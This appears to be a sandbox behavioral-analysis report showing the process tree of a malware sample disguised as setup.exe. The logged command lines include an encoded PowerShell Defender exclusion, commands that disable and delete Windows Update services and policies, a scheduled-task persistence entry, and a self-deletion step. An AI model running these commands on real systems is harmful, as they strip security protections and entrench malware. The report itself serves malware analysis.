| ZeroBOX

setup.exe "C:\Users\test22\AppData\Local\Temp\setup.exe"
2796
- 76587423657325823.exe "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe"
  2908
  - AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    145512
- SIJPFdhsui3sdfSF.exe "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe"
  2972
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbQB2ACMAPgAgAEAAKAAgADwAIwBpAGIAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEAZQBnACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAHYAawB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAegAjAD4A"
    145652
  - cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    145888
    - sc.exe sc stop UsoSvc
      145948
    - sc.exe sc stop WaaSMedicSvc
      145996
    - sc.exe sc stop wuauserv
      146044
    - sc.exe sc stop bits
      146092
    - sc.exe sc stop dosvc
      146140
    - reg.exe reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
      146188
    - reg.exe reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
      146232
    - reg.exe reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
      146284
    - reg.exe reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
      146400
    - reg.exe reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
      3040
    - takeown.exe takeown /f C:\Windows\System32\WaaSMedicSvc.dll
      2128
    - icacls.exe icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
      2188
    - reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
      2584
    - reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
      2712
    - reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
      2936
    - reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
      3096
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      3152
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      3236
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      3344
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      3472
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      3548
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      3616
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      3704
  - cmd.exe "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    145540
    - powercfg.exe powercfg /x -hibernate-timeout-ac 0
      2068
    - powercfg.exe powercfg /x -hibernate-timeout-dc 0
      2120
    - powercfg.exe powercfg /x -standby-timeout-ac 0
      2236
    - powercfg.exe powercfg /x -standby-timeout-dc 0
      2296
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""
    2428
    - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""
      2460
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsAutHost"
    2776
    - schtasks.exe schtasks /run /tn "WindowsAutHost"
      2864
  - cmd.exe "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe"
    3320
    - choice.exe choice /C Y /N /D Y /T 3
      3424

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents